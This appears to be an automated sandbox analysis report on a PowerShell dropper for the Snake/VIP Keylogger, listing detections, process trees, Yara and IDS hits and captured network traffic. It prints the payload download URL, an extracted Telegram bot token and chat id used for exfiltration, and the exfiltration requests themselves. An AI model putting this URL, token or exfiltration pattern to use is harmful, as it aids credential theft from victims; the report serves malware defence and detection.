
Windows Analysis Report
believe.ps1

Overview

General Information

Sample name: believe.ps1
Analysis ID: 1638285
MD5: aeb93759c04d569f52546d72ed703596
SHA1: 73665fa6587a138945e12c48b3c683ce91c27490
SHA256: f7325182772f91e4293f2751dedef7930430cb91e357f2d643d2dc615816b335
Tags: ps1, user-TornadoAV_dev

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Powershell drops PE file
Sample uses string decryption to hide its real strings
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 6636 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\believe.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • x.exe (PID: 4292 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: FC2AA7BEED400468B816DB83CF00815D)
      • x.exe (PID: 5156 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: FC2AA7BEED400468B816DB83CF00815D)
  • notepad.exe (PID: 668 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\believe.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Extracted malware configuration (VIP Keylogger):
{"Exfil Mode": "Telegram", "Bot Token": "7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o", "Chat id": "6163418482"}
Extracted malware configuration (Snake Keylogger):
{"Exfil Mode": "Telegram", "Token": "7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o", "Chat_id": "6163418482", "Version": "4.4"}
Yara matches (network capture)
Source | Rule | Description | Author
dump.pcap | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
dump.pcap | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  Strings:
  • 0x356d4:$a1: get_encryptedPassword
  • 0x359fd:$a2: get_encryptedUsername
  • 0x35406:$a3: get_timePasswordChanged
  • 0x3550f:$a4: get_passwordField
  • 0x356ea:$a5: set_encryptedPassword
  • 0x36f7c:$a7: get_logins
  • 0x36edf:$a10: KeyLoggerEventArgs
  • 0x36b44:$a11: KeyLoggerEventArgsEventHandler

Yara matches (memory dumps)
Source | Rule | Description | Author
00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  Strings:
  • 0x1e112:$a1: get_encryptedPassword
  • 0x1e43b:$a2: get_encryptedUsername
  • 0x1df22:$a3: get_timePasswordChanged
  • 0x1e02b:$a4: get_passwordField
  • 0x1e128:$a5: set_encryptedPassword
  • 0x1f80a:$a7: get_logins
  • 0x1f76d:$a10: KeyLoggerEventArgs
  • 0x1f3d2:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.1321698645.0000000003287000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(18 further entries not included in this extract)

Yara matches (unpacked PE files)
Source | Rule | Description | Author
4.2.x.exe.328c714.2.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
4.2.x.exe.3287ec1.1.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
4.2.x.exe.3287ec1.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
4.2.x.exe.328c714.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
5.2.x.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(17 further entries not included in this extract)

                      System Summary

Sigma rule matches
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\believe.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\believe.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\believe.ps1", ProcessId: 6636, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\believe.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\believe.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\believe.ps1", ProcessId: 6636, ProcessName: powershell.exe

Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-14T11:00:02.564605+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.12 | 49692 | 104.21.64.1 | 443 | TCP
2025-03-14T11:00:11.779493+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.12 | 49695 | 104.21.64.1 | 443 | TCP
2025-03-14T11:00:20.152461+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.12 | 49703 | 104.21.64.1 | 443 | TCP
2025-03-14T11:00:26.323535+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.12 | 62154 | 104.21.64.1 | 443 | TCP
2025-03-14T10:59:59.451659+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.12 | 49690 | 158.101.44.242 | 80 | TCP
2025-03-14T11:00:01.951652+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.12 | 49690 | 158.101.44.242 | 80 | TCP
2025-03-14T11:00:11.170526+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.12 | 49693 | 158.101.44.242 | 80 | TCP
2025-03-14T11:00:28.825751+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.12 | 62172 | 149.154.167.220 | 443 | TCP


                      AV Detection

Source: http://176.65.144.3/dev/believe.exe | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\RUNPEE.dll | Avira: detection malicious, Label: TR/Injector.vqojt
Source: C:\Users\user\AppData\Local\Temp\x.exe | Avira: detection malicious, Label: TR/Injector.vqojt
Source: 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o", "Chat id": "6163418482"}
Source: 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o", "Chat_id": "6163418482", "Version": "4.4"}
Source: C:\Users\user\AppData\Local\Temp\RUNPEE.dll | ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\x.exe | ReversingLabs: Detection: 66%
Source: believe.ps1 | Virustotal: Detection: 29%
Source: believe.ps1 | ReversingLabs: Detection: 31%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.2% probability
Source: 4.2.x.exe.4a696b8.3.unpack | String decryptor: 7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o
Source: 4.2.x.exe.4a696b8.3.unpack | String decryptor: 6163418482
Source: 4.2.x.exe.4a696b8.3.unpack | String decryptor:

                      Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49691 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:62172 version: TLS 1.2
Source: Binary string: CZG3HF22.pdbH | source: x.exe, 00000004.00000000.1301812032.0000000000F12000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
Source: Binary string: CZG3HF22.pdb | source: x.exe, 00000004.00000000.1301812032.0000000000F12000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4x nop then jmp 018847D7h | 4_2_01884688
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4x nop then jmp 0188482Ch | 4_2_01884688
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4x nop then jmp 00BEF45Dh | 5_2_00BEF2C4
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4x nop then jmp 00BEF45Dh | 5_2_00BEF4AC
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4x nop then jmp 00BEF45Dh | 5_2_00BEF52F
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4x nop then jmp 00BEFC19h | 5_2_00BEF974

                      Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.12:62172 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | TCP traffic: 192.168.2.12:62148 -> 1.1.1.1:53
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Mar 2025 09:59:57 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Mon, 17 Feb 2025 11:23:00 GMTETag: "43600-62e54bf3d7570"Accept-Ranges: bytesContent-Length: 275968Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 68 ba 8e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 20 04 00 00 14 00 00 00 00 00 00 7e 3e 04 00 00 20 00 00 00 40 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 04 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 3e 04 00 4b 00 00 00 00 40 04 00 17 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 1e 04 00 00 20 00 00 00 20 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 17 10 00 00 00 40 04 00 00 12 00 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 04 00 00 02 00 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 3e 04 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 9e 02 00 a4 9f 01 00 03 00 
00 00 ab 00 00 06 d4 9d 02 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 83 7d fc 0f 8e b3 e8 69 73 af ff 00 00 00 00 00 00 01 02 03 04 06 08 08 00 00 00 00 00 00 00 00 7e 00 00 00 46 00 00 00 40 00 00 00 37 00 00 00 25 00 00 00 6d 00 00 00 24 00 00 00 7e 00 00 00 7e 00 00 00 64 00 00 00 72 00 00 00 61 00 00 00 47 00 00 00 6f 00 00 00 6e 00 00 00 7e 00 00 00 1e 02 28 20 00 00 0a 2a 26 00 02 28 21 00 00 0a 00 2a ce 73 22 00 00 0a 80 01 00 00 04 73 23 00 00 0a 80 02 00 00 04 73 24 00 00 0a 80 03 00 00 04 73 25 00 00 0a 80 04 00 00 04 73 26 00 00 0a 80 05 00 00 04 2a 5a 00 03 fe 16 06 00 00 1b 6f 39 00 00 0a 00 03 fe 15 06 00 00 1b 2a 26 00 02 28 3a 00 00 0a 00 2a 26 00 03 fe 15 06 00 00 1b 2a 22 00 02 80 09 00 00 04 2a 56 73 1d 00 00 06 28 43 00 00 0a 74 09 00 00 02 80 0a 00 00 04 2a 1e 02 28 44 00 00 0a 2a 22 7e 0b 00 00 04 2b 00 2a 22 7e 0c 00 00 04 2b 00 2a 22 7e 0d 00 00 04 2b 00 2a 1e 02 80 0d 00 00 04 2a 22 7e 0e 00 00 04 2b 00 2a 22 7e 0f 00
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:721680%0D%0ADate%20and%20Time:%2015/03/2025%20/%2016:17:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20721680%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /dev/believe.exe HTTP/1.1 | Host: 176.65.144.3 | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 176.65.144.3
Source: Joe Sandbox View | IP Address: 104.21.64.1
Source: Joe Sandbox View | IP Address: 104.21.64.1
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49693 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49690 -> 158.101.44.242:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.12:49695 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.12:49703 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.12:49692 -> 104.21.64.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.12:62154 -> 104.21.64.1:443
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49691 version: TLS 1.0
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:721680%0D%0ADate%20and%20Time:%2015/03/2025%20/%2016:17:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20721680%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /dev/believe.exe HTTP/1.1 | Host: 176.65.144.3 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
